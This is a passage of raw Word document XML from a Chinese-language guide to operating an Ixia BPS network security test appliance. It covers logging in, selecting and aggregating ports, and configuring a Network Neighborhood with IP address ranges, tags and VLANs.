                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>S</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ys</w:t>
      </w:r>
      <w:r w:rsidRPr="003E3E5A">
        <w:t>info</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004056D3" w:rsidRPr="003E3E5A" w:rsidRDefault="004056D3" w:rsidP="004056D3">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3E5A">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A7DB905" wp14:editId="442FE090">
            <wp:extent cx="3866667" cy="904762"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="29709" name="图片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866667" cy="904762"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="107" w:name="_Toc499884736"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>BPS测试仪</w:t>
      </w:r>
      <w:bookmarkEnd w:id="107"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS测试仪是IXIA推出了l2-l7层安全测试</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>仪，除了传统的在l2~l3层的测试功能外，BPS更侧重在l4~l7层的测试功能使用。可以灵活的构造模拟各种realworld的流量，有丰富的攻击特征库可以模拟大量的威胁攻击流量，同时支持多种攻击逃逸的方法，可谓是安全防护产品测试的一把利器。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="108" w:name="_Toc499884737"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:t>BPS 界面的登录</w:t>
      </w:r>
      <w:bookmarkEnd w:id="108"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BPS</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>测试仪提供B/S的管理架构，可直接在浏览器中输入设备的管理口地址进行登陆：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1520" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7BC6D5F1" wp14:editId="160A7265">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>198755</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击红框中的图标，打开 BPS 的主要操作界面</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="109" w:name="_bookmark2"/>
      <w:bookmarkStart w:id="110" w:name="_Toc499884738"/>
      <w:bookmarkEnd w:id="109"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:t>端口的占用</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1、</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击右上角的红框位置，打开机框图</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2、如下图所示</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我们可以看到这是一台 8 口的 1GE/10GE 双速率的 PerfectStorm 设备</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="29D33947" wp14:editId="27490F31">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1905</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5200420" cy="2859405"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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200420" cy="2859405"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>3.只需要在希望的端口上点击鼠标左键进行选择，就会发现端口出现图中的样子，代表已经被选中。BPS 的端口序号是从 0 开始，所以 8 个端口的序号分别为 0~7。图中 0:1 中的 1 代表的是逻辑 1 号端口，这个逻辑 1 端口与后面创建 Neighborhood 中的 Interface1 直接对应，软件会根据使用者先点击哪个端口便赋予该端口为逻辑端口1。假设图中先点击4 端口，则会显示成为 4:1。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="152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anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="38D89FB2" wp14:editId="697341C9">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5252586" cy="1252061"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5715"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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252586" cy="1252061"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. BPS 的端口资源汇聚功能很简单，只需要将多个端口都选择上，假如后面在测试的过程中只使用了两个端口，这时BPS 会默认的把其他端口的资源都汇聚给使用的两个口</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="05AF98DC" wp14:editId="3C87E56C">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>93980</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5254625" cy="1226820"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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89" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5254625" cy="1226820"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1520" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_bookmark3"/>
      <w:bookmarkStart w:id="112" w:name="_Toc499884739"/>
      <w:bookmarkEnd w:id="111"/>
      <w:r w:rsidRPr="002A0C5E">
        <w:lastRenderedPageBreak/>
        <w:t>Network Neighborhood 的配置</w:t>
      </w:r>
      <w:bookmarkEnd w:id="112"/>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Neighborhood 在 BPS 的软件中最主要的作用是给测试的端口赋予 IP 地址，除此之外还有类似 IPSEC，NAT，GTP 等其他协议栈的堆栈的配置也是在这里配置</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在 BPS 的主界面上点击Control Center 中的 New Neighborhood</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="44792E3C" wp14:editId="77EF9101">
            <wp:extent cx="5213350" cy="2794000"/>
            <wp:effectExtent l="0" t="0" r="6350" b="6350"/>
            <wp:docPr id="297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213350" cy="2794000"/>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t>新的界面中左侧只是提供了一些快捷模板，例如被测设备</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>是透明模式（只有二层转发）</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，这样测试仪模拟的端口就需要都在同一个subnet 之下，同网段就可以通信。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3C9AD211" wp14:editId="1A79B603">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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91" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>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t>假如选择 Router，代表被测设备为</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>路由模式</w:t>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，这样测试仪模拟的端口就需要属于不同的 subnet。但是，其实这系列的组网都是可以通过 Switch 的模式中修改配置转换过来，并不一定只能选择其中一个。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="152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4A4850C7" wp14:editId="534FCB44">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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92" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>选择  Switch，然后点击右下角的Create，给新创建的模板起个名字，点击OK</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3735DBE7" wp14:editId="2841EB7C">
            <wp:extent cx="5240020" cy="3141345"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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t>在新的界面中，我们首先看到红框部分，这里的 1 和 2 就代表了之前占用端口部分中的逻辑端口 1 和 2，所以 BPS 是这样去匹配硬件物理端口的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="03F3C13A" wp14:editId="394884FE">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2971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94" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>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drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E22E395" wp14:editId="0B81A6C5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>428268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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95" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>展开 IPv4 Static Host，可以根据需要，去修改 IP 地址的起始值、个数、网关、掩码等信息，点击右下角的save 进行保存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>具体的某一段的 IP 地址段是赋予哪个逻辑端口，我们可以通过截图部分中的 Container下拉框去选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="1420" w:right="1680" w:bottom="280" w:left="1680" w:header="720" w:footer="720" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="07E78CAA" wp14:editId="590C18F8">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="297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96" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>点击 Add Row，增加了新的一个地址段，该段地址的起始地址为 1.3.0.1，个数为 100，网关为 1.0.0.1，掩码为 8。在这里，我们把这个地址段赋予给了 Interface1，这时，Interface1就会拥有两段不同的 IP 地址段。在这里还需要特别留意 Tags 这个标志位，因为后续具体哪个地址段仿真Client 和 Server，就会选择相应的 Tags 中的名称来决定。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4026B950" wp14:editId="289FF606">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="1905"/>
            <wp:docPr id="297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240247" cy="3141726"/>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t>如果需要增加新的逻辑端口 Interface、vlan 等信息，可以如图的位置去选择</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
          <w:pgSz w:w="11910" w:h="16840"/>
          <w:pgMar w:top="142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1BAE145B" wp14:editId="004FA82D">
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2972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98" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>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drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0AF373E8" wp14:editId="38B24F8B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>428268</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5240247" cy="3141726"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="297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99" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5240247" cy="3141726"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="002A0C5E">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>如果需要增加其他协议堆栈，比如 IPv6 等，可以从如截图的位置去选择，用法和 IPv4的一致</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0053045B" w:rsidRPr="002A0C5E" w:rsidRDefault="0053045B" w:rsidP="0053045B">
      <w:pPr>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="0053045B" w:rsidRPr="002A0C5E">
